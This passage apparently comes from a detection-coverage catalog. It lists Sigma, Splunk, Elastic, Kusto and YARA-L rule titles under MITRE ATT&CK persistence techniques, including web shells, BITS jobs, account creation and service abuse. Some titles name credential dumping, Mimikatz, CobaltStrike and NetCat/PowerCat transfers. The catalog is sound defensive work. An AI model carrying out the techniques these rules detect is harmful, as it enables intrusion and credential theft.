- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled - Registry test
- Elastic Outlook Home Page Registry Modification production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Port Forwarding Rule Addition production
- Splunk Possible Credential Dumping via Windows Network Providers (PowerShell)
- Splunk Possible Credential Dumping via Windows Network Providers (Windows Event Log)
- Elastic Potential NetNTLMv1 Downgrade Attack production
- Sigma Potential NetWire RAT Activity - Registry test
- Sigma Potential Persistence Via Custom Protocol Handler test
- Sigma Potential Persistence Via Event Viewer Events.asp test
- Elastic Potential Persistence via Mandatory User Profile production
- Sigma Potential Persistence Via Outlook Home Page test
- Sigma Potential Persistence Via Outlook Today Page test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Qakbot Registry Activity test
- Sigma Potential Raspberry Robin Registry Set Internet Settings ZoneMap test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Suspicious Registry File Imported Via Reg.EXE test
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- YARA-L Potential Tampering With RDP Related Registry Keys Via Reg.EXE
- Sigma Potential Ursnif Malware Activity - Registry test
- Sigma Potentially Suspicious Desktop Background Change Using Reg.EXE test
- Sigma Potentially Suspicious Desktop Background Change Via Registry test
- Sigma PowerShell Logging Disabled Via Registry Key Tampering test
- Splunk PowerShell Modifying Registry Values (PowerShell)
- Splunk PowerShell Modifying Registry Values (Sysmon)
- Splunk PowerShell Modifying Registry Values (Windows Event Log)
- Elastic PowerShell Script Block Logging Disabled production
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Sigma RDP Sensitive Settings Changed test
- YARA-L RDP Sensitive Settings Changed
- Sigma RDP Sensitive Settings Changed to Zero test
- YARA-L RDP Sensitive Settings Changed to Zero
- Sigma RedMimicry Winnti Playbook Registry Manipulation test
- Sigma Reg Add Suspicious Paths test
- Splunk Reg.exe Process Execution (Sysmon)
- Splunk Reg.exe Process Execution (Windows Event Log)
- Splunk Regini.exe Execution (Sysmon)
- Splunk Regini.exe Execution (Windows Event Log)
- Sigma Registry Entries For Azorult Malware test
- Splunk Registry Entry Created - PowerShell (PowerShell)
- Sigma Registry Explorer Policy Modification test
- Sigma Registry Hide Function from User test
- Splunk Registry key added with reg.exe (Sysmon)
- Splunk Registry key added with reg.exe (Windows Event Log)
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Sigma Registry Modification Attempt Via VBScript experimental
- Sigma Registry Modification Attempt Via VBScript - PowerShell experimental
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Registry Modification Via Regini.EXE test
- Elastic Registry Persistence via AppInit DLL production
- Sigma Registry Tampering by Potentially Suspicious Processes experimental
- Splunk Remcos client registry install entry production
- Sigma Removal of Potential COM Hijacking Registry Keys test
- Sigma RestrictedAdminMode Registry Value Tampering test
- YARA-L RestrictedAdminMode Registry Value Tampering
- Sigma RestrictedAdminMode Registry Value Tampering - ProcCreation test
- Splunk Revil Registry Entry production
- Sigma Run Once Task Configuration in Registry test
- Sigma Run Once Task Execution as Configured in Registry test
- Splunk Rundll32 Shimcache Flush production
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Service Binary in Suspicious Folder test
- Sigma Service Binary in User Controlled Folder test
- Elastic Service Disabled via Registry Modification production
- Elastic Service Path Modification production
- Sigma ShimCache Flush stable
- YARA-L ShimCache Flush
- Elastic SolarWinds Process Disabling Services via Registry production
- Elastic Startup or Run Key Registry Modification production
- Elastic Suspicious ImagePath Service Creation production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Splunk Suspicious Reg exe Process production
- Sigma Suspicious Registry Modification From ADS Via Regini.EXE test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBoxDrvInst.exe Parameters test
- Sigma Sysmon Channel Reference Deletion test
- Sigma Terminal Server Client Connection History Cleared - Registry test
- Sigma Trust Access Disable For VBApplications test
- Sigma Uncommon Microsoft Office Trusted Location Added test
- Elastic Uncommon Registry Persistence Change production
- Elastic Unusual Persistence via Services Registry production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma Wdigest CredGuard Registry Modification test
- Sigma Wdigest Enable UseLogonCredential test
- YARA-L Wdigest Enable UseLogonCredential
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Anomalous Registry Value Length in Environment Key production
- Splunk Windows Defender ASR Registry Modification production
- Splunk Windows Defender ASR Rule Disabled production
- Elastic Windows Defender Disabled via Registry Modification production
- Splunk Windows Deleted Registry By A Non Critical Process File Path production
- Splunk Windows Disable Change Password Through Registry production
- Splunk Windows Disable Lock Workstation Feature Through Registry production
- Splunk Windows Disable LogOff Button Through Registry production
- Splunk Windows Disable Notification Center production
- Splunk Windows Disable Shutdown Button Through Registry production
- Splunk Windows Disable Windows Group Policy Features Through Registry production
- Splunk Windows Downdate Registry Activity production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows Hide Notification Features Through Registry production
- Splunk Windows Impair Defenses Disable AV AutoStart via Registry production
- Splunk Windows InProcServer32 New Outlook Form production
- Splunk Windows Modify Registry AuthenticationLevelOverride production
- Splunk Windows Modify Registry Auto Minor Updates production
- Splunk Windows Modify Registry Auto Update Notif production
- Splunk Windows Modify Registry Configure BitLocker production
- Splunk Windows Modify Registry Default Icon Setting production
- Splunk Windows Modify Registry Delete Firewall Rules production
- Splunk Windows Modify Registry Disable RDP production
- Splunk Windows Modify Registry Disable Restricted Admin production
- Splunk Windows Modify Registry Disable Toast Notifications production
- Splunk Windows Modify Registry Disable Win Defender Raw Write Notif production
- Splunk Windows Modify Registry Disable WinDefender Notifications production
- Splunk Windows Modify Registry Disable Windows Security Center Notif production
- Splunk Windows Modify Registry DisableRemoteDesktopAntiAlias production
- Splunk Windows Modify Registry DisableSecuritySettings production
- Splunk Windows Modify Registry Disabling WER Settings production
- Splunk Windows Modify Registry DisAllow Windows App production
- Splunk Windows Modify Registry Do Not Connect To Win Update production
- Splunk Windows Modify Registry DontShowUI production
- Splunk Windows Modify Registry EnableLinkedConnections production
- Splunk Windows Modify Registry LongPathsEnabled production
- Splunk Windows Modify Registry MaxConnectionPerServer production
- Splunk Windows Modify Registry No Auto Reboot With Logon User production
- Splunk Windows Modify Registry No Auto Update production
- Splunk Windows Modify Registry NoChangingWallPaper production
- Splunk Windows Modify Registry on Smart Card Group Policy production
- Splunk Windows Modify Registry ProxyEnable production
- Splunk Windows Modify Registry ProxyServer production
- Splunk Windows Modify Registry Qakbot Binary Data Registry production
- Splunk Windows Modify Registry Regedit Silent Reg Import production
- Splunk Windows Modify Registry Suppress Win Defender Notif production
- Splunk Windows Modify Registry Tamper Protection production
- Splunk Windows Modify Registry to Add or Modify Firewall Rule production
- Splunk Windows Modify Registry UpdateServiceUrlAlternate production
- Splunk Windows Modify Registry USeWuServer production
- Splunk Windows Modify Registry Utilize ProgIDs production
- Splunk Windows Modify Registry ValleyRAT C2 Config production
- Splunk Windows Modify Registry ValleyRat PWN Reg Entry production
- Splunk Windows Modify Registry With MD5 Reg Key Name production
- Splunk Windows Modify Registry WuServer production
- Splunk Windows Modify Registry wuStatusServer production
- Splunk Windows Modify Show Compress Color And Info Tip Registry production
- Splunk Windows New InProcServer32 Added production
- Splunk Windows Outlook Dialogs Disabled from Unusual Process production
- Splunk Windows Outlook LoadMacroProviderOnBoot Persistence production
- Splunk Windows Outlook WebView Registry Modification production
- Splunk Windows Routing and Remote Access Service Registry Key Change production
- Splunk Windows RunMRU Registry Key or Value Deleted production
- Splunk Windows Set Network Profile Category to Private via Registry production
- Splunk Windows Snake Malware Registry Modification wav OpenWithProgIds production
- Splunk Windows SnappyBee Create Test Registry production
- Elastic Windows Subsystem for Linux Distribution Installed production
- Sigma Winlogon AllowMultipleTSSessions Enable test
External Remote Services T1133 28 rules
- Splunk Detect Exchange Web Shell production
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (PowerShell)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Sysmon)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Windows Event Log)
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Splunk Outbound Network Connection from Java Using Default Ports production
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Splunk RDP Brute-force Detection (Windows Event Log)
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Splunk RDP Hijacking (Windows Event Log)
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Sigma Remote Access Tool - ScreenConnect Installation Execution test
- Sigma Remote Access Tool - Team Viewer Session Started On Windows Host test
- Sigma Running Chrome VPN Extensions via the Registry 2 VPN Extension test
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Temporary ConnectWise xml File Activity (Windows Event Log)
- Sigma Unusual Child Process of dns.exe test
- Sigma Unusual File Deletion by Dns.exe test
- Sigma Unusual File Modification by dns.exe test
- Sigma User Added to Remote Desktop Users Group test
- Splunk Web or Application Server Spawning a Shell production
- Splunk Windows MOVEit Transfer Writing ASPX production
- Splunk Windows PaperCut NG Spawn Shell production
- Splunk Windows RDPClient Connection Sequence Events production
Create Account T1136 44 rules
- Kusto Account Creation available
- Sigma Computer account created with privileges experimental
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Creation of a Hidden Local User Account production
- Sigma Creation of a Local Hidden User Account by Registry test
- Sigma DarkGate - User Created Via Net.EXE test
- Splunk Detect New Local Admin account production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma Fortinet APT group abuse on Windows (user) experimental
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma Hidden Local User Creation test
- Sigma Local User Creation test
- Sigma Manipulation of User Computer or Group Security Principals Across AD test
- Sigma New User Created Via Net.EXE test
- YARA-L New User Created Via Net.EXE
- Sigma New User Created Via Net.EXE With Never Expire Option test
- Sigma PowerShell Create Local User test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PSEXEC Remote Execution File Artefact test
- Sigma Serv-U Exploitation CVE-2021-35211 by DEV-0322 test
- Splunk Short Lived Windows Accounts production
- Sigma Suspicious computer account created by a computer account experimental
- Sigma Suspicious Windows ANONYMOUS LOGON Local Account Created test
- Kusto Unusual identity creation using exchange powershell
- Sigma User account created by a computer account experimental
- Elastic User Account Creation production
- Sigma User account creation disguised in a computer account experimental
- Sigma User Added to Remote Desktop Users Group test
- Sigma User creation via commandline
- Sigma User enumeration and creation related to Manic Menagerie 2.0 (via cmdline)
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows Computer Account Changed to Domain Controller production
- Splunk Windows Create Local Account production
- Splunk Windows Create Local Administrator Account Via Net production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows ESX Admins Group Creation Security Event production
- Splunk Windows ESX Admins Group Creation via Net production
- Splunk Windows ESX Admins Group Creation via PowerShell production
- Splunk Windows Privileged Group Modification production
Create Account: Local Account T1136.001 27 rules
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Creation of a Hidden Local User Account production
- Sigma Creation of a Local Hidden User Account by Registry test
- Sigma DarkGate - User Created Via Net.EXE test
- Splunk Detect New Local Admin account production
- Sigma Hidden Local User Creation test
- Sigma Local User Creation test
- Sigma New User Created Via Net.EXE test
- YARA-L New User Created Via Net.EXE
- Sigma New User Created Via Net.EXE With Never Expire Option test
- Sigma PowerShell Create Local User test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Serv-U Exploitation CVE-2021-35211 by DEV-0322 test
- Splunk Short Lived Windows Accounts production
- Sigma Suspicious Windows ANONYMOUS LOGON Local Account Created test
- Elastic User Account Creation production
- Sigma User Added to Remote Desktop Users Group test
- Sigma User creation via commandline
- Sigma User enumeration and creation related to Manic Menagerie 2.0 (via cmdline)
- Splunk Windows Create Local Account production
- Splunk Windows Create Local Administrator Account Via Net production
- Splunk Windows ESX Admins Group Creation Security Event production
- Splunk Windows ESX Admins Group Creation via Net production
- Splunk Windows ESX Admins Group Creation via PowerShell production
- Splunk Windows Privileged Group Modification production
Create Account: Domain Account T1136.002 18 rules
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic dMSA Account Creation by an Unusual User production
- Sigma Manipulation of User Computer or Group Security Principals Across AD test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PSEXEC Remote Execution File Artefact test
- Sigma Suspicious Windows ANONYMOUS LOGON Local Account Created test
- Elastic User Account Creation production
- Sigma User creation via commandline
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Splunk Windows Computer Account Changed to Domain Controller production
- Splunk Windows ESX Admins Group Creation Security Event production
- Splunk Windows ESX Admins Group Creation via Net production
- Splunk Windows ESX Admins Group Creation via PowerShell production
- Splunk Windows Privileged Group Modification production
Create Account: Cloud Account T1136.003 1 rule
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
Office Application Startup T1137 21 rules
- Sigma Code Executed Via Office Add-in XLL File test
- Sigma IE Change Domain Zone test
- Sigma New Outlook Macro Created test
- Sigma Office Application Startup - Office Test test
- Elastic Office Test Registry Persistence production
- Elastic Outlook Home Page Registry Modification production
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Sigma Outlook Security Settings Updated - Registry test
- Sigma Outlook Task/Note Reminder Received test
- Sigma Potential Persistence Via Excel Add-in - Registry test
- Sigma Potential Persistence Via Microsoft Office Add-In test
- Sigma Potential Persistence Via Microsoft Office Startup Folder test
- Sigma Potential Persistence Via Outlook Form test
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Potential Persistence Via Visual Studio Tools for Office test
- Sigma Registry Modification to Hidden File Extension test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Sigma Suspicious Outlook Macro Created test
- Splunk Windows Outlook LoadMacroProviderOnBoot Persistence production
- Splunk Windows Outlook Macro Created by Suspicious Process production
- Splunk Windows Outlook Macro Security Modified production
Office Application Startup: Office Test T1137.002 2 rules
- Sigma Office Application Startup - Office Test test
- Elastic Office Test Registry Persistence production
Office Application Startup: Outlook Forms T1137.003 1 rule
- Sigma Potential Persistence Via Outlook Form test
Office Application Startup: Outlook Home Page T1137.004 1 rule
- Elastic Outlook Home Page Registry Modification production
Office Application Startup: Add-ins T1137.006 5 rules
- Sigma Code Executed Via Office Add-in XLL File test
- Sigma Potential Persistence Via Excel Add-in - Registry test
- Sigma Potential Persistence Via Microsoft Office Add-In test
- Sigma Potential Persistence Via Visual Studio Tools for Office test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
Software Extensions T1176 6 rules
- Elastic Browser Extension Install production
- Sigma ChromeLoader Malware Execution test
- Sigma Chromium Browser Instance Executed With Custom Extension test
- Sigma Suspicious Chromium Browser Instance Executed With Custom Extension test
- Elastic Uncommon Registry Persistence Change production
- Splunk Windows Disable Internet Explorer Addons production
Software Extensions: Browser Extensions T1176.001 4 rules
- Elastic Browser Extension Install production
- Sigma Chromium Browser Instance Executed With Custom Extension test
- Sigma Suspicious Chromium Browser Instance Executed With Custom Extension test
- Splunk Windows Disable Internet Explorer Addons production
BITS Jobs T1197 28 rules
- Sigma BITS Client BitsProxy DLL Loaded By Uncommon Process experimental
- Splunk BITS Job Persistence production
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Sigma BITS Transfer Job Download From Direct IP test
- Sigma BITS Transfer Job Download From File Sharing Domains test
- Sigma BITS Transfer Job Download To Potential Suspicious Folder test
- Sigma BITS Transfer Job Downloading File Potential Suspicious Extension test
- Sigma BITS Transfer Job With Uncommon Or Suspicious Remote TLD test
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Monitoring For Persistence Via BITS test
- Sigma New BITS Job Created Via Bitsadmin test
- Sigma New BITS Job Created Via PowerShell test
- Elastic Persistence via BITS Job Notify Cmdline production
- Splunk PowerShell Start-BitsTransfer production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
Server Software Component T1505 66 rules
- Sigma Chopper Webshell Process Pattern test
- Sigma Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) experimental
- Splunk Detect Exchange Web Shell production
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Sigma Exchange transport agent injection via configuration file experimental
- Sigma Exchange transport agent installation artifacts (PowerShell) experimental
- Sigma Execution From Webserver Root Folder test
- Sigma HTTP Logging Disabled On IIS Server test
- Sigma IIS Native-Code Module Command Line Installation test
- Splunk IIS Worker (W3WP) Spawn Command Line (Windows Event Log)
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Sysmon)
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Windows Event Log)
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Sigma MSExchange Transport Agent Installation test
- Sigma New Module Module Added To IIS Server test
- Sigma Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential Webshell Creation On Static Website test
- Sigma Previously Installed IIS Module Was Removed test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Kusto SQL Server spawning suspicious child process
- Sigma SQL server sqlcmd utility abuse for privilege escalation experimental
- Sigma SQL Server started in single mode (command) experimental
- Sigma Suspicious ASPX File Drop by Exchange test
- Sigma Suspicious Child Process Of SQL Server test
- Sigma Suspicious File Drop by Exchange test
- Sigma Suspicious File Write to SharePoint Layouts Directory experimental
- Sigma Suspicious File Write to Webapps Root Directory experimental
- Sigma Suspicious IIS Module Registration test
- Sigma Suspicious MSExchangeMailboxReplication ASPX Write test
- Sigma Suspicious Process By Web Server Process test
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Elastic Unusual Process For MSSQL Service Accounts production
- Sigma Webserver IIS configuration edited (SYSMON) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (PowerShell) experimental
- Sigma Webserver IIS module installed via GAC manipulation (PowerShell) experimental
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Sigma Webshell Tool Reconnaissance Activity test
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Splunk Windows IIS Components Add New Module production
- Splunk Windows IIS Components Module Failed to Load production
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows Potential Web Shell Creation For VMware Workspace ONE production
- Splunk Windows PowerShell Add Module to Global Assembly Cache production
- Splunk Windows PowerShell Disable HTTP Logging production
- Splunk Windows PowerShell IIS Components WebGlobalModule Usage production
- Splunk Windows Server Software Component GACUtil Install to GAC production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows SharePoint Spinstall0 Webshell File Creation production
- Splunk Windows Shell or Script Execution From IIS Directory production
- Splunk Windows Shell Process from CrushFTP production
- Splunk Windows SQL Server Configuration Option Hunt production
- Splunk Windows SQL Server Critical Procedures Enabled production
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
- Splunk Windows SQL Server xp_cmdshell Config Change production
- Splunk Windows Sqlservr Spawning Shell production
- Splunk Windows Suspicious Child Process Spawned From WebServer production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows WSUS Spawning Shell production
Server Software Component: SQL Stored Procedures T1505.001 12 rules
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Sysmon)
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Windows Event Log)
- Sigma Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader test
- Kusto SQL Server spawning suspicious child process
- Sigma SQL server sqlcmd utility abuse for privilege escalation experimental
- Sigma SQL Server started in single mode (command) experimental
- Elastic Unusual Process For MSSQL Service Accounts production
- Splunk Windows SQL Server Configuration Option Hunt production
- Splunk Windows SQL Server Critical Procedures Enabled production
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
- Splunk Windows SQL Server xp_cmdshell Config Change production
- Splunk Windows Sqlservr Spawning Shell production
Server Software Component: Transport Agent T1505.002 3 rules
- Sigma Exchange transport agent injection via configuration file experimental
- Sigma Exchange transport agent installation artifacts (PowerShell) experimental
- Sigma MSExchange Transport Agent Installation test
Server Software Component: Web Shell T1505.003 30 rules
- Sigma Chopper Webshell Process Pattern test
- Sigma Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) experimental
- Splunk Detect Exchange Web Shell production
- Sigma Execution From Webserver Root Folder test
- Sigma IIS Native-Code Module Command Line Installation test
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Sigma Potential Webshell Creation On Static Website test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Sigma Suspicious ASPX File Drop by Exchange test
- Sigma Suspicious Child Process Of SQL Server test
- Sigma Suspicious File Drop by Exchange test
- Sigma Suspicious File Write to SharePoint Layouts Directory experimental
- Sigma Suspicious File Write to Webapps Root Directory experimental
- Sigma Suspicious MSExchangeMailboxReplication ASPX Write test
- Sigma Suspicious Process By Web Server Process test
- Sigma Suspicious Process Spawned by CentreStack Portal AppPool experimental
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Sigma Webshell Tool Reconnaissance Activity test
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows Potential Web Shell Creation For VMware Workspace ONE production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows SharePoint Spinstall0 Webshell File Creation production
- Splunk Windows Suspicious Child Process Spawned From WebServer production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows WSUS Spawning Shell production
Server Software Component: IIS Components T1505.004 20 rules
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Sigma HTTP Logging Disabled On IIS Server test
- Splunk IIS Worker (W3WP) Spawn Command Line (Windows Event Log)
- Sigma New Module Module Added To IIS Server test
- Sigma Previously Installed IIS Module Was Removed test
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Sigma Suspicious IIS Module Registration test
- Sigma Webserver IIS configuration edited (SYSMON) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (command) experimental
- Sigma Webserver IIS module installed (PowerShell) experimental
- Sigma Webserver IIS module installed via GAC manipulation (PowerShell) experimental
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Splunk Windows IIS Components Add New Module production
- Splunk Windows IIS Components Module Failed to Load production
- Splunk Windows PowerShell Add Module to Global Assembly Cache production
- Splunk Windows PowerShell Disable HTTP Logging production
- Splunk Windows PowerShell IIS Components WebGlobalModule Usage production
- Splunk Windows Server Software Component GACUtil Install to GAC production
- Splunk Windows Shell or Script Execution From IIS Directory production
Server Software Component: Terminal Services DLL T1505.005 1 rule
- Sigma Potential Suspicious Activity Using SeCEdit test
Pre-OS Boot T1542 8 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Suspicious File in EFI Volume production
- Splunk Windows WinLogon with Public Network Connection production
Pre-OS Boot: System Firmware T1542.001 3 rules
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows Suspicious File in EFI Volume production
Pre-OS Boot: Bootkit T1542.003 3 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows WinLogon with Public Network Connection production
Create or Modify System Process T1543 135 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Clop Ransomware Known Service Name production
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CodeIntegrity - Blocked Driver Load With Revoked Certificate test
- Sigma CodeIntegrity - Blocked Image/Driver Load For Policy Violation test
- Kusto COM Event System Loading New DLL
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma KrbRelayUp Service Installation test
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Splunk LLM Model File Creation production
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Elastic Network Logon Provider Registry Modification production
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Sigma PUA - Process Hacker Driver Load test
- Sigma PUA - Process Hacker Execution test
- Sigma PUA - System Informer Driver Load test
- Sigma PUA - System Informer Execution test
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
